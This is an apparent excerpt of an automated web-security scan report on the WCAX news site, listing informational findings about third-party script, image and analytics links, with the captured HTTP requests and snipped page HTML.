<link type="text/css" rel="stylesheet" media="all" href="http://content.worldnow.com/global/interface/container-e/core.css?ver=201011111600">
<link type="text/css" rel="stylesheet" media="all" href="http://WCAX.images.worldnow.com/interface/css/container-e.css?ver=2011-03-26%2003%3A55%3A56">
<!--[if lt IE 6]>
...[SNIP]...
<![endif]-->
<link rel="stylesheet" type="text/css" href="http://content.worldnow.com/global/interface/integration/jquery.fancybox-1.3.1.css" media="screen">
<!--MENU INCLUDES-->
<link rel="stylesheet" href="http://content.worldnow.com/global/interface/menu/menu.css?ver=201011111600" type="text/css"><style type="text/css">
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/menu/menu.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/integration/thirdparty.js?ver=201011111600"></script>
...[SNIP]...
<label for="WNSearchBox-headertop-google_cs">WEB SEARCH BY <img src='http://WCAX.images.worldnow.com/global/images/google/google-logo.gif' alt='Google' class='wnSearchBoxLabelImg-google'></label>
...[SNIP]...
<noscript><iframe id="WNLinksContent391987" name="WNLinksContent391987" class="wnLinksContentIframe" src="http://ftpcontent.worldnow.com/wcax/custom/branding_feature_i.html" width="100%" height="70" scrolling="no" frameborder="0" marginwidth="0" marginheight="0">[Your user agent does not support frames or is currently configured to not display frames. However, you may visit <a href="http://ftpcontent.worldnow.com/wcax/custom/branding_feature_i.html">the related document.</a>
...[SNIP]...
<!--END wnDS70-->
<img id="WNBrandingImage" usemap="#wnBrandingMap" alt="" border="0" onload="if (window.WNElement) WNElement.positionOver('WNDS70', 'WNBrandingImage', { horizontal : 'right', vertical : 'middle' });" src="http://WCAX.images.worldnow.com/images/static/hdr/hdr_branding.jpg"><map name="wnBrandingMap">
...[SNIP]...
<a href="/Global/category.asp?C=18195"><img src="http://WCAX.images.worldnow.com/images/272499_G.gif" width="37" height="29" border="0" alt="Home WCAX.com" title="Home WCAX.com" onsrc="http://WCAX.images.worldnow.com/images/272500_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18197"><img src="http://WCAX.images.worldnow.com/images/272501_G.gif" width="34" height="29" border="0" alt="Local News" title="Local News" onsrc="http://WCAX.images.worldnow.com/images/272502_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18196"><img src="http://WCAX.images.worldnow.com/images/272503_G.gif" width="54" height="29" border="0" alt="Weather" title="Weather" onsrc="http://WCAX.images.worldnow.com/images/272504_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18198"><img src="http://WCAX.images.worldnow.com/images/272505_G.gif" width="43" height="29" border="0" alt="Sports" title="Sports" onsrc="http://WCAX.images.worldnow.com/images/272506_G.gif"></a>
...[SNIP]...
<a href="/Global/link.asp?L=408799"><img src="http://WCAX.images.worldnow.com/images/272508_G.gif" width="74" height="29" border="0" alt="WCAX Vermontopia Community Calendar" title="WCAX Vermontopia Community Calendar" onsrc="http://WCAX.images.worldnow.com/images/272509_G.gif"></a>
...[SNIP]...
<a href="javascript:OpenWin('http://www.vermontopia.com||height=768,width=1024,location=yes,resizable=yes,scrollbars=yes,toolbar=yes');"><img src="http://WCAX.images.worldnow.com/images/272510_G.gif" width="82" height="29" border="0" alt="Vermontopia.com" title="Vermontopia.com" onsrc="http://WCAX.images.worldnow.com/images/272511_G.gif"></a>
...[SNIP]...
<a href="/Global/link.asp?L=398823"><img src="http://WCAX.images.worldnow.com/images/272512_G.gif" width="74" height="29" border="0" alt="WCAX Promotions" title="WCAX Promotions" onsrc="http://WCAX.images.worldnow.com/images/272513_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=68446"><img src="http://WCAX.images.worldnow.com/images/272514_G.gif" width="54" height="29" border="0" alt="LIFESTYLE" title="LIFESTYLE" onsrc="http://WCAX.images.worldnow.com/images/272516_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18836"><img src="http://WCAX.images.worldnow.com/images/272517_G.gif" width="60" height="29" border="0" alt="Contact Us" title="Contact Us" onsrc="http://WCAX.images.worldnow.com/images/272518_G.gif"></a>
...[SNIP]...
<a href="/Global/story.asp?S=452838"><img src="http://WCAX.images.worldnow.com/images/452838_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=452767"><img src="http://WCAX.images.worldnow.com/images/452767_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=1755776"><img src="http://WCAX.images.worldnow.com/images/1755776_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=452737"><img src="http://WCAX.images.worldnow.com/images/452737_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=7415644"><img src="http://WCAX.images.worldnow.com/images/7415644_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=452787"><img src="http://WCAX.images.worldnow.com/images/452787_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=452936"><img src="http://WCAX.images.worldnow.com/images/452936_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=452752"><img src="http://WCAX.images.worldnow.com/images/452752_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=1048744"><img src="http://WCAX.images.worldnow.com/images/1048744_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=12839072"><img src="http://WCAX.images.worldnow.com/images/12839072_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=11921157"><img src="http://WCAX.images.worldnow.com/images/11921157_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=11522841"><img src="http://WCAX.images.worldnow.com/images/11522841_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=451691"><img src="http://WCAX.images.worldnow.com/images/451691_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=452830"><img src="http://WCAX.images.worldnow.com/images/452830_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=12799373"><img src="http://WCAX.images.worldnow.com/images/12799373_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=452746"><img src="http://WCAX.images.worldnow.com/images/452746_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=11471372"><img src="http://WCAX.images.worldnow.com/images/11471372_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=14005481"><img src="http://WCAX.images.worldnow.com/images/14005481_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=923402"><img src="http://WCAX.images.worldnow.com/images/923402_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=452854"><img src="http://WCAX.images.worldnow.com/images/452854_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=452861"><img src="http://WCAX.images.worldnow.com/images/452861_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=452867"><img src="http://WCAX.images.worldnow.com/images/452867_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=452870"><img src="http://WCAX.images.worldnow.com/images/452870_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=13270759"><img src="http://WCAX.images.worldnow.com/images/13270759_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=452936"><img src="http://WCAX.images.worldnow.com/images/452936_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=8748030"><img src="http://WCAX.images.worldnow.com/images/8748030_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=13230909"><img src="http://WCAX.images.worldnow.com/images/13230909_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=12840575"><img src="http://WCAX.images.worldnow.com/images/12840575_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=11522911"><img src="http://WCAX.images.worldnow.com/images/11522911_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=11529474"><img src="http://WCAX.images.worldnow.com/images/11529474_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=11522781"><img src="http://WCAX.images.worldnow.com/images/11522781_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=10925688"><img src="http://WCAX.images.worldnow.com/images/10925688_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=13288895"><img src="http://WCAX.images.worldnow.com/images/13288895_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=11280686"><img src="http://WCAX.images.worldnow.com/images/11280686_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=10883466"><img src="http://WCAX.images.worldnow.com/images/10883466_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=10883519"><img src="http://WCAX.images.worldnow.com/images/10883519_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=13073817"><img src="http://WCAX.images.worldnow.com/images/13073817_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=11280673"><img src="http://WCAX.images.worldnow.com/images/11280673_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=10926020"><img src="http://WCAX.images.worldnow.com/images/10926020_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=10883514"><img src="http://WCAX.images.worldnow.com/images/10883514_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=10876888"><img src="http://WCAX.images.worldnow.com/images/10876888_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=11280710"><img src="http://WCAX.images.worldnow.com/images/11280710_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="WNCopyright"><a href="http://www.worldnow.com" target="_blank"><img src="http://WCAX.images.worldnow.com/images/static/container-e/wn_powerby.gif" alt="Powered by WorldNow" border="0"></a>
...[SNIP]...
<noscript><img src="http://analytics.worldnow.com/dcsuhch2hzersfqyzf2de5tct_4d8l/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.0.0&amp;WT.sp=WCAX&amp;dcssip=www.wcax.com" name="DCSIMG" width="1" height="1" border="0" alt=""></noscript>
...[SNIP]...
<!--Page Include: BODY--><script type="text/javascript" src="http://tags.crwdcntrl.net/c/492/cc.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/global_zoom.js?ver=201011111600"></script>
...[SNIP]...
10.199. http://www.wcax.com/Global/category.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /Global/category.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Global/category.asp?C=189321 HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=465801
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; __qca=P0-1094680209-1302352442492; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302353981562:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: IIS11
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
wn_vars: CACHE_DB
Content-Type: text/html; charset=utf-8
ntCoent-Length: 63503
Cache-Control: private, max-age=300
Expires: Sat, 09 Apr 2011 13:20:59 GMT
Date: Sat, 09 Apr 2011 13:15:59 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 63503

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head>
<META http-equiv="Content-Type" content="text/html">
<title>Phollowing
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/analytics/sdctag.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/globals.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/jq.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/container-e/core.js?ver=201011111600"></script>
<script type="text/javascript" language="JavaScript1.3" src="http://content.worldnow.com/global/tools/video/VideoFunctions.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WCAX.images.worldnow.com/interface/js/wnadmanager.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WCAX.images.worldnow.com/interface/js/wnvideo.js?ver=201011111600"></script>
<link type="text/css" rel="stylesheet" media="all" href="http://content.worldnow.com/global/interface/container-e/core.css?ver=201011111600">
<link type="text/css" rel="stylesheet" media="all" href="http://WCAX.images.worldnow.com/interface/css/container-e.css?ver=2011-03-26%2003%3A55%3A56">
<!--[if lt IE 6]>
...[SNIP]...
<![endif]-->
<link rel="stylesheet" type="text/css" href="http://content.worldnow.com/global/interface/integration/jquery.fancybox-1.3.1.css" media="screen">
<!--MENU INCLUDES-->
<link rel="stylesheet" href="http://content.worldnow.com/global/interface/menu/menu.css?ver=201011111600" type="text/css"><style type="text/css">
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/menu/menu.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/integration/thirdparty.js?ver=201011111600"></script>
...[SNIP]...
<label for="WNSearchBox-headertop-google_cs">WEB SEARCH BY <img src='http://WCAX.images.worldnow.com/global/images/google/google-logo.gif' alt='Google' class='wnSearchBoxLabelImg-google'></label>
...[SNIP]...
<div id="WNBranding"><img id="WNBrandingImage" usemap="#wnBrandingMap" alt="" border="0" src="http://WCAX.images.worldnow.com/images/static/hdr/hdr_branding.jpg"><map name="wnBrandingMap">
...[SNIP]...
<a href="/Global/category.asp?C=18195"><img src="http://WCAX.images.worldnow.com/images/272499_G.gif" width="37" height="29" border="0" alt="Home WCAX.com" title="Home WCAX.com" onsrc="http://WCAX.images.worldnow.com/images/272500_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18197"><img src="http://WCAX.images.worldnow.com/images/272501_G.gif" width="34" height="29" border="0" alt="Local News" title="Local News" onsrc="http://WCAX.images.worldnow.com/images/272502_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18196"><img src="http://WCAX.images.worldnow.com/images/272503_G.gif" width="54" height="29" border="0" alt="Weather" title="Weather" onsrc="http://WCAX.images.worldnow.com/images/272504_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18198"><img src="http://WCAX.images.worldnow.com/images/272505_G.gif" width="43" height="29" border="0" alt="Sports" title="Sports" onsrc="http://WCAX.images.worldnow.com/images/272506_G.gif"></a>
...[SNIP]...
<a href="/Global/link.asp?L=408799"><img src="http://WCAX.images.worldnow.com/images/272508_G.gif" width="74" height="29" border="0" alt="WCAX Vermontopia Community Calendar" title="WCAX Vermontopia Community Calendar" onsrc="http://WCAX.images.worldnow.com/images/272509_G.gif"></a>
...[SNIP]...
<a href="javascript:OpenWin('http://www.vermontopia.com||height=768,width=1024,location=yes,resizable=yes,scrollbars=yes,toolbar=yes');"><img src="http://WCAX.images.worldnow.com/images/272510_G.gif" width="82" height="29" border="0" alt="Vermontopia.com" title="Vermontopia.com" onsrc="http://WCAX.images.worldnow.com/images/272511_G.gif"></a>
...[SNIP]...
<a href="/Global/link.asp?L=398823"><img src="http://WCAX.images.worldnow.com/images/272512_G.gif" width="74" height="29" border="0" alt="WCAX Promotions" title="WCAX Promotions" onsrc="http://WCAX.images.worldnow.com/images/272513_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=68446"><img src="http://WCAX.images.worldnow.com/images/272514_G.gif" width="54" height="29" border="0" alt="LIFESTYLE" title="LIFESTYLE" onsrc="http://WCAX.images.worldnow.com/images/272516_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18836"><img src="http://WCAX.images.worldnow.com/images/272517_G.gif" width="60" height="29" border="0" alt="Contact Us" title="Contact Us" onsrc="http://WCAX.images.worldnow.com/images/272518_G.gif"></a>
...[SNIP]...
<h2 id="WNContainerHeader"><img src="http://WCAX.images.worldnow.com/images/189321_CH.jpg" alt="" title="" border="0" width="325" class="wnImage wnImageCenter wnImageWidth-325">
</h2>
...[SNIP]...
<div><a href="http://www.addthis.com/bookmark.php?v=250&pub=xa-4a6f307d7c62c8a7"
onmouseover="return addthis_open(this, '', '?widgetId=' + addThisWNDynamicWidgetId, 'Slideshow')"
onmouseout="addthis_close()" onclick="return addthis_sendto()"><img src="http://s7.addthis.com/static/btn/sm-share-en.gif" width="83" height="16" alt="Bookmark and Share" style="border:0"/></a>
...[SNIP]...
</span> <img class="wnVideoIncluded" src="http://WCAX.images.worldnow.com/images/static/container-e/icon_video_included.gif" alt="Video included" border="0"></a>
...[SNIP]...
<a href="/Global/story.asp?S=13279741"><img src="http://WCAX.images.worldnow.com/images/13279741_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
</span> <img class="wnVideoIncluded" src="http://WCAX.images.worldnow.com/images/static/container-e/icon_video_included.gif" alt="Video included" border="0"></a>
...[SNIP]...
<a href="/Global/story.asp?S=12661178"><img src="http://WCAX.images.worldnow.com/images/12661178_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=12533287"><img src="http://WCAX.images.worldnow.com/images/12533287_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<a href="/Global/story.asp?S=12658085"><img src="http://WCAX.images.worldnow.com/images/12658085_SS.jpg" alt="" title="" border="0" width="90"></a>
...[SNIP]...
<div id="WNCopyright"><a href="http://www.worldnow.com" target="_blank"><img src="http://WCAX.images.worldnow.com/images/static/container-e/wn_powerby.gif" alt="Powered by WorldNow" border="0"></a>
...[SNIP]...
<noscript><img src="http://analytics.worldnow.com/dcsuhch2hzersfqyzf2de5tct_4d8l/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.0.0&amp;WT.sp=WCAX&amp;dcssip=www.wcax.com" name="DCSIMG" width="1" height="1" border="0" alt=""></noscript>
...[SNIP]...
<!--Page Include: BODY--><script type="text/javascript" src="http://tags.crwdcntrl.net/c/492/cc.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/global_zoom.js?ver=201011111600"></script>
...[SNIP]...
10.200. http://www.wcax.com/Global/link.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /Global/link.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Global/link.asp?L=408799 HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352293178:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: IIS07
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
wn_vars: CACHE_DB
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 26034
Cache-Control: private, max-age=900
Date: Sat, 09 Apr 2011 12:34:01 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 26034

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head>
<META http-equiv="Content-Type" content="text/html">
<title>WCAX Vermo
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/analytics/sdctag.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/globals.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/jq.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/container-e/core.js?ver=201011111600"></script>
<script type="text/javascript" language="JavaScript1.3" src="http://content.worldnow.com/global/tools/video/VideoFunctions.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WCAX.images.worldnow.com/interface/js/wnadmanager.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WCAX.images.worldnow.com/interface/js/wnvideo.js?ver=201011111600"></script>
<link type="text/css" rel="stylesheet" media="all" href="http://content.worldnow.com/global/interface/container-e/core.css?ver=201011111600">
<link type="text/css" rel="stylesheet" media="all" href="http://WCAX.images.worldnow.com/interface/css/container-e.css?ver=2011-03-26%2003%3A55%3A56">
<!--[if lt IE 6]>
...[SNIP]...
<![endif]-->
<link rel="stylesheet" type="text/css" href="http://content.worldnow.com/global/interface/integration/jquery.fancybox-1.3.1.css" media="screen">
<!--MENU INCLUDES-->
<link rel="stylesheet" href="http://content.worldnow.com/global/interface/menu/menu.css?ver=201011111600" type="text/css"><style type="text/css">
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/menu/menu.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/integration/thirdparty.js?ver=201011111600"></script>
...[SNIP]...
<label for="WNSearchBox-headertop-google_cs">WEB SEARCH BY <img src='http://WCAX.images.worldnow.com/global/images/google/google-logo.gif' alt='Google' class='wnSearchBoxLabelImg-google'></label>
...[SNIP]...
<div id="WNBranding"><img id="WNBrandingImage" usemap="#wnBrandingMap" alt="" border="0" src="http://WCAX.images.worldnow.com/images/static/hdr/hdr_branding.jpg"><map name="wnBrandingMap">
...[SNIP]...
<a href="/Global/category.asp?C=18195"><img src="http://WCAX.images.worldnow.com/images/272499_G.gif" width="37" height="29" border="0" alt="Home WCAX.com" title="Home WCAX.com" onsrc="http://WCAX.images.worldnow.com/images/272500_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18197"><img src="http://WCAX.images.worldnow.com/images/272501_G.gif" width="34" height="29" border="0" alt="Local News" title="Local News" onsrc="http://WCAX.images.worldnow.com/images/272502_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18196"><img src="http://WCAX.images.worldnow.com/images/272503_G.gif" width="54" height="29" border="0" alt="Weather" title="Weather" onsrc="http://WCAX.images.worldnow.com/images/272504_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18198"><img src="http://WCAX.images.worldnow.com/images/272505_G.gif" width="43" height="29" border="0" alt="Sports" title="Sports" onsrc="http://WCAX.images.worldnow.com/images/272506_G.gif"></a>
...[SNIP]...
<a href="/Global/link.asp?L=408799"><img src="http://WCAX.images.worldnow.com/images/272508_G.gif" width="74" height="29" border="0" alt="WCAX Vermontopia Community Calendar" title="WCAX Vermontopia Community Calendar" onsrc="http://WCAX.images.worldnow.com/images/272509_G.gif"></a>
...[SNIP]...
<a href="javascript:OpenWin('http://www.vermontopia.com||height=768,width=1024,location=yes,resizable=yes,scrollbars=yes,toolbar=yes');"><img src="http://WCAX.images.worldnow.com/images/272510_G.gif" width="82" height="29" border="0" alt="Vermontopia.com" title="Vermontopia.com" onsrc="http://WCAX.images.worldnow.com/images/272511_G.gif"></a>
...[SNIP]...
<a href="/Global/link.asp?L=398823"><img src="http://WCAX.images.worldnow.com/images/272512_G.gif" width="74" height="29" border="0" alt="WCAX Promotions" title="WCAX Promotions" onsrc="http://WCAX.images.worldnow.com/images/272513_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=68446"><img src="http://WCAX.images.worldnow.com/images/272514_G.gif" width="54" height="29" border="0" alt="LIFESTYLE" title="LIFESTYLE" onsrc="http://WCAX.images.worldnow.com/images/272516_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=18836"><img src="http://WCAX.images.worldnow.com/images/272517_G.gif" width="60" height="29" border="0" alt="Contact Us" title="Contact Us" onsrc="http://WCAX.images.worldnow.com/images/272518_G.gif"></a>
...[SNIP]...
<noscript><iframe id="Frame1" name="Frame1" class="wnLinksContentIframe" src="http://www.vermontopia.com/event/" width="100%" height="1500" frameborder="0" marginwidth="0" marginheight="0">[Your user agent does not support frames or is currently configured to not display frames. However, you may visit <a href="http://www.vermontopia.com/event/">the related document.</a>
...[SNIP]...
<div id="WNCopyright"><a href="http://www.worldnow.com" target="_blank"><img src="http://WCAX.images.worldnow.com/images/static/container-e/wn_powerby.gif" alt="Powered by WorldNow" border="0"></a>
...[SNIP]...
<noscript><img src="http://analytics.worldnow.com/dcsuhch2hzersfqyzf2de5tct_4d8l/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.0.0&amp;WT.sp=WCAX&amp;dcssip=www.wcax.com" name="DCSIMG" width="1" height="1" border="0" alt=""></noscript>
...[SNIP]...
<!--Page Include: BODY--><script type="text/javascript" src="http://tags.crwdcntrl.net/c/492/cc.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/global_zoom.js?ver=201011111600"></script>
...[SNIP]...
10.201. http://www.wcax.com/Global/story.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /Global/story.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Global/story.asp?S=14408244 HTTP/1.1
Host: www.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18197
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ClientGroup=1; __qca=P0-1094680209-1302352442492; WT_FPC=id=20d5f21d8a4972ac84d1302352164716:lv=1302352451310:ss=1302352164716

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
WN: IIS12
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
wn_vars: MEMORY
Content-Type: text/html; charset=utf-8
ntCoent-Length: 35416
Cache-Control: private, max-age=290
Expires: Sat, 09 Apr 2011 12:39:12 GMT
Date: Sat, 09 Apr 2011 12:34:22 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 35416

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head>
<META http-equiv="Content-Type" content="text/html">
<title>Police: RI
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/analytics/sdctag.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/globals.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/jq.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/container-e/core.js?ver=201011111600"></script>
<script type="text/javascript" language="JavaScript1.3" src="http://content.worldnow.com/global/tools/video/VideoFunctions.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WCAX.images.worldnow.com/interface/js/wnadmanager.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WCAX.images.worldnow.com/interface/js/wnvideo.js?ver=201011111600"></script>
<link type="text/css" rel="stylesheet" media="all" href="http://content.worldnow.com/global/interface/container-e/core.css?ver=201011111600">
<link type="text/css" rel="stylesheet" media="all" href="http://WCAX.images.worldnow.com/interface/css/container-e.css?ver=2011-03-26%2003%3A55%3A56">
<!--[if lt IE 6]>
...[SNIP]...
<![endif]-->
